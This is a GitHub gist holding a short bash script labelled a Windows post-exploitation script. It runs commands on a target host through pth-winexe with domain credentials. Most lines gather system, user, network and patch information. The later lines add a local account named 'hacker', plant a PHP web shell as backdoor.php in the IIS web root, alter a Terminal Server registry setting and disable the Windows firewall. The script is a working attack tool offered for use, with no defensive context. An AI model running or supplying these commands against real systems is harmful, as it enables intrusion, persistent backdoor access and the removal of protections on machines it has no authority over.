Skip to content

Instantly share code, notes, and snippets.

@1N3
Created February 3, 2016 12:18
Show Gist options
  • Save 1N3/c784d60f6e5956e019c7 to your computer and use it in GitHub Desktop.
Save 1N3/c784d60f6e5956e019c7 to your computer and use it in GitHub Desktop.
A Windows post exploitation shell script
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment